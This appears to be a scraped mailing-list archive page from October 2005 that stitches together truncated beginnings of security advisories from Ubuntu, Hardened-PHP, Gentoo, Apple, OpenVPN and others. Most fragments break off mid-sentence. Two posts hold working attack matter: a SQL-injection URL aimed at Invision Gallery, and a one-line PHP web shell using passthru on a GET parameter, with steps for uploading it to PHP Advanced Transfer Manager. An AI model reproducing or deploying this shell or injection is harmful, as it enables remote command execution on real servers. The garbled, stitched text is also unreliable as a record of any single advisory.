===
Ubuntu Security Notice USN-206-2 October 29, 2005
lynx regression fix
===
A security issue affects the following Ubuntu releases:
Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04
===
Ubuntu Security Notice USN-213-1 October 28, 2005
sudo vulnerability
CVE-2005-2959
===
A security issue affects the following Ubuntu releases:
Ubuntu 4.10 (Warty Warthog)
===
Ubuntu Security Notice USN-151-3 October 28, 2005
aide vulnerabilities
CVE-2005-1849, CVE-2005-2096
===
A security issue affects the following Ubuntu releases:
Ubuntu
Objective
The primary objective of the Beta-Announce list is to provide the
SecurityFocus community access to upcoming security tool and product beta
trials. In the same vein it will provide access to tool authors and vendors
to announce their beta programs and get valuable feedback from the
===
Ubuntu Security Notice USN-212-1 October 28, 2005
libgda2 vulnerability
CAN-2005-2958
===
A security issue affects the following Ubuntu releases:
Ubuntu 4.10 (Warty
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hardened-PHP Project
www.hardened-php.net
-= Security Advisory =-
Advisory: PHP File-Upload $GLOBALS Overwrite Vulnerability
Release Date: 2005/10/31
Last Modified:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hardened-PHP Project
www.hardened-php.net
-= Security Advisory =-
Advisory: PHP register_globals Activation Vulnerability in parse_str()
Release Date: 2005/10/31
Last
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hardened-PHP Project
www.hardened-php.net
-= Security Advisory =-
Advisory: PHP Cross Site Scripting (XSS) Vulnerability in phpinfo()
Release Date: 2005/10/31
Last
[EMAIL PROTECTED]: OpenVPN[v2.0.x]: foreign_option() format string
vulnerability.
1. BACKGROUND
OpenVPN is a robust and highly configurable VPN (Virtual Private Network)
daemon which
can be used to securely link two or more private networks using an encrypted
tunnel over
the Internet.
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hardened-PHP Project
www.hardened-php.net
-= Security Advisory =-
Advisory: phpBB Multiple Vulnerabilities
Release Date: 2005/10/31
Last Modified: 2005/10/31
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200510-26
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
Credit: By aLMaSTeR HaCKeR [ [EMAIL PROTECTED]
Vulnerable: Invision Gallery 2.0.3
EXPLIOT:
http://www.site.com/index.php?automodule=gallerycmd=sccat=26sort_key=dateorder_key=DESCprune_key=30st=|aLMaSTeR
The Error:
mySQL query error: SELECT i.*, m.members_display_name AS name, m.id AS mid,
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
The Honeynet Project and Research Alliance are pleased to announce the
release of mwcollect v3.0.0 on http://www.mwcollect.org/ .
What's new?
The core has been completly rewritten. It is now even more modularized
and has prooven to be very stable.
Class: Input Validation Error
CVE: CVE-MAP-NOMATCH
Remote: Yes
Discovered BY ABDUCTER Expliot BY DEVIL-00
[EMAIL PROTECTED] (OR) [EMAIL PROTECTED]
Vulnerable:powered by oaboard 1.0
//
info:- FOR INFORMATION VISIT
Read link =)
http://www.securityfocus.com/bid/13542/exploit
This old bug ;)
Good luke discovered!
uplod phpshell in PHP Advanced Transfer Manager
one save as the code :
pre
?
passthru($_GET['sQl']);
?
file save as sQl.php.ns
now upload in the PHP Advanced
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
APPLE-SA-2005-10-31 Mac OS X v10.4.3
Mac OS X v10.4.3 and Mac OS X Server v10.4.3 are now available and
deliver the following security enhancements:
Finder
CVE-ID: CVE-2005-2749
Available for: Mac OS X v10.4.2, Mac OS X Server v10.4.2
Impact:
16 matches
Mail list logo